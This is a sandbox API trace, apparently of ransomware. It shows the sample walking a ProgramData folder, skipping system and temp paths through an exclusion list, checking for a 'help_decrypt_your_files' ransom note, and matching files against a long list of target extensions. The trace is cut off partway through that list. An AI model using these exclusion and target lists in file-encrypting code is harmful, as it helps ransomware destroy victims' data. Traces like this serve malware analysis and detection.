	[0177.828] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 0
	[0177.828] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.828] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.829] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XboxLive", cAlternateFileName="")) returned 0
	[0177.829] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0177.829] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0177.829] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xfd4aa69b, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~3")) returned 1
	[0177.829] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1
	[0177.830] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1
	[0177.830] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0177.830] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0177.830] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Microsoft Help") returned="C:\\Users\\All Users\\Microsoft Help"
	[0177.830] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Microsoft Help") returned="C:\\Users\\All Users\\Microsoft Help"
	[0177.830] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.830] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.830] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\*.*") returned="C:\\Users\\All Users\\Microsoft Help\\*.*"
	[0177.830] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help\\*.*" (normalized: "c:\\users\\all users\\microsoft help\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xfd4aa69b, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0177.840] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\*.*") returned 37
	[0177.840] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.840] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\all users\\microsoft help\\*.*") returned 0x25
	[0177.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="windows") returned 0x0
	[0177.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="boot") returned 0x0
	[0177.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="system volume information") returned 0x0
	[0177.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="temp") returned 0x0
	[0177.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="program files") returned 0x0
	[0177.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="appdata") returned 0x0
	[0177.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="application data") returned 0x0
	[0177.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="winnt") returned 0x0
	[0177.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="tmp") returned 0x0
	[0177.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="cache") returned 0x0
	[0177.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.844] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="webcache") returned 0x0
	[0177.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="inetcache") returned 0x0
	[0177.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="nvidia") returned 0x0
	[0177.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="packages") returned 0x0
	[0177.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="cookies") returned 0x0
	[0177.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.846] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="programdata") returned 0x0
	[0177.846] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xfd4aa69b, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.847] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x53a17a4e, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x53a17a4e, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x53abb353, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.DATABASECOMPARE.16.1033.hxn", cAlternateFileName="MSDATA~1.HXN")) returned 1
	[0177.847] lstrcmpW (lpString1="MS.DATABASECOMPARE.16.1033.hxn", lpString2="..") returned 1
	[0177.847] lstrcmpW (lpString1="MS.DATABASECOMPARE.16.1033.hxn", lpString2=".") returned 1
	[0177.848] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.848] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.DATABASECOMPARE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.DATABASECOMPARE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.DATABASECOMPARE.16.1033.hxn"
	[0177.848] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.DATABASECOMPARE.16.1033.hxn") returned 64
	[0177.848] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.848] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.DATABASECOMPARE.16.1033.hxn", cchLength=0x40 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn") returned 0x40
	[0177.848] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.848] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.848] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn"
	[0177.849] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.databasecompare.16.1033.hxn") returned 64
	[0177.849] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.849] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.849] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.850] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x54cb123d, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x54cb123d, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x54d3ec39, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.16.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1
	[0177.850] lstrcmpW (lpString1="MS.EXCEL.16.1033.hxn", lpString2="..") returned 1
	[0177.850] lstrcmpW (lpString1="MS.EXCEL.16.1033.hxn", lpString2=".") returned 1
	[0177.850] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.850] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.EXCEL.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.16.1033.hxn"
	[0177.850] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.16.1033.hxn") returned 54
	[0177.850] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.850] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.16.1033.hxn", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn") returned 0x36
	[0177.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.851] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn"
	[0177.851] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.excel.16.1033.hxn") returned 54
	[0177.851] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.851] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.852] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.j